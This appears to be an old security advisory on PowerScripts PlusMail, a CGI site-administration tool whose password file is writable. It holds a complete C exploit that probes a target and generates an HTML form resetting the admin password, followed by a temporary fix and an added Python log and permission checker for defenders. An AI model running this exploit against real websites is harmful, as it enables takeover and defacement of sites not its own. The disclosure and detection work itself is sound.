COMMAND
PlusMail
SYSTEMS AFFECTED
PowerScripts PlusMail (All versions to current)
PROBLEM
YT Cracker found the following (gH Security Advisory). PlusMail is
an extremely popular CGI-based administration tool that lets you
take control of your website through a graphical control-panel
interface. The password file, however, is set with read/write
permissions enabled, so the password can be changed at will. The
following code detects the vulnerability and generates the HTML
required to exploit it. PlusMail has been noticed running on
multiple operating systems. The vulnerability lies in the web-based
tool, which, once exploited, gives you "ADVANCED CONTROL" of a
target website. Below is the code by ytcracker of gH, which
demonstrates how easy it is to generate the HTML page which is
loaded by your web browser to compromise the target host. It was
noticed that PlusMail is widely used, but the main PlusMail site
has not yet been found, so the developers could not be notified of
the remote vulnerability.
Most likely this will be ripped out during online trading, because
script kids are not likely to like this factual addition, but
nevertheless it will be expressed. This exploit was written to
point out security weaknesses, and in no way promotes web page
defacements. If you use this program to gain access to anything not
normally accessible to you, meaning you script kids, then you are
subject to prosecution and could even get 10 years in prison. Is it
honestly worth it to compile this program, randomly ./hack sites and
deface them with this half-way automated program just to put your
nick and group on it? The answer is NO.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char *argv[])
{
    int sock;
    ssize_t n;
    struct sockaddr_in sin;
    struct hostent *he;
    char *detect;
    char buffer[1024];
    /* probe request: a 404 in the reply means /cgi-bin/plusmail is not there */
    char plusvuln[] = "GET /cgi-bin/plusmail HTTP/1.0\n\n";
    /* the generated page is a plain form that posts a new password to the target's CGI */
    char htmI[] = "<html><head><title>[gH plusmail exploit]</title></head><body><form action=\"http://";
    char htmII[] = "/cgi-bin/plusmail\" method=\"post\">"
        "<p>username: <input type=\"text\" name=\"username\"><br>"
        "password: <input type=\"password\" name=\"password\"><br>"
        "retype password: <input type=\"password\" name=\"password1\"></p>"
        "<p><input type=\"submit\" name=\"new_login\" value=\"reset password\"></p></form>"
        "<p><a href=\"http://pure-security.net\">Pure Security Networks</a></p></body></html>";
    FILE *html;

    printf("\n [gH plusmail exploit] [ytcracker] [phed@felons.org]\n");
    if (argc < 2) {
        printf(" usage: %s [vulnerable website]\n\n", argv[0]);
        exit(0);
    }
    if ((he = gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname");
        exit(0);
    }
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("socket");
        exit(1);
    }
    memset(&sin, 0, sizeof(sin));
    memcpy(&sin.sin_addr, he->h_addr, he->h_length);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
        perror("connect");
        exit(1);            /* the original carried on with a dead socket */
    }
    send(sock, plusvuln, strlen(plusvuln), 0);
    n = recv(sock, buffer, sizeof(buffer) - 1, 0);
    if (n < 0)
        n = 0;
    buffer[n] = '\0';       /* strstr() needs a terminated string */
    detect = strstr(buffer, "404");
    close(sock);
    if (detect != NULL) {
        printf(" vulnerability not detected.\n");
        exit(0);
    }
    printf(" vulnerability detected. generating html...\n");
    html = fopen("plus.html", "w+b");
    if (html == NULL) {
        perror("fopen");
        exit(1);
    }
    fprintf(html, "%s%s%s", htmI, argv[1], htmII);
    fclose(html);
    printf(" spawning lynx...\n");
    system("lynx plus.html");
    return 0;
}
Note that the exploit's own system() call runs lynx through the shell, so the exploit itself can be exploited; use execv() instead.
SOLUTION
Move/rename the PlusMail directory as a temporary fix.
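Added example, not part of the advisory and not PlusMail code: a defender-side check in Python for the two things the advisory describes. It scans web server access-log lines (Apache common log format is assumed) for the probe and the password-reset POST against /cgi-bin/plusmail that the exploit above produces, and it tests the permission bits of the PlusMail password file, taking "rw enabled" to mean group or other write permission (my reading). The log lines are constructed, the addresses are documentation ranges, and the password file path is site-specific and must be supplied by the administrator.

```python
import os
import re
import stat

# Apache "common" log format: ip ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

PLUSMAIL_PATH = "/cgi-bin/plusmail"

# Constructed sample log lines (not from any real server).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2000:13:55:36 -0700] "GET /cgi-bin/plusmail HTTP/1.0" 200 2326
203.0.113.5 - - [10/Oct/2000:13:55:40 -0700] "POST /cgi-bin/plusmail HTTP/1.0" 200 512
198.51.100.7 - - [10/Oct/2000:14:01:02 -0700] "GET /index.html HTTP/1.0" 200 1043
198.51.100.7 - - [10/Oct/2000:14:02:10 -0700] "GET /cgi-bin/plusmail HTTP/1.0" 404 210
this line is not a log entry
"""


def classify(entry):
    """Label one parsed request by what the exploit on this page would do.

    The exploit first GETs the CGI and treats anything but a 404 as "present",
    then POSTs a new password to it from a locally generated form.
    """
    if entry["path"].split("?", 1)[0] != PLUSMAIL_PATH:
        return None
    if entry["method"] == "POST":
        return "password-reset attempt"
    if entry["status"] == "404":
        return "probe, CGI not present"
    return "probe, CGI reachable"


def find_plusmail_requests(lines):
    """Return (ip, method, status, label) for every request to the plusmail CGI."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # unparseable line, skip it
        label = classify(m.groupdict())
        if label:
            hits.append((m["ip"], m["method"], m["status"], label))
    return hits


def mode_is_writable_by_others(mode):
    """True if the group or other write bit is set in an st_mode value."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def password_file_check(path):
    """Stat the PlusMail password file (path supplied by the admin) and flag loose bits."""
    return mode_is_writable_by_others(os.stat(path).st_mode)


if __name__ == "__main__":
    for hit in find_plusmail_requests(SAMPLE_LOG.splitlines()):
        print("%-14s %-4s %s  %s" % hit)
```

Every legitimate use of the PlusMail control panel also POSTs to the same CGI, so the POST label on its own is only a lead; in the common log format there is nothing to tell an administrator's form apart from the exploit's locally generated one. If the server writes the combined format, the Referer field helps: a reset whose Referer is not the site's own control panel page (or is absent) deserves a look. The permission check is the other half: with the advisory's temporary fix applied (directory moved or renamed) the log hits become 404s, but the password file should still not be writable by anyone other than its owner.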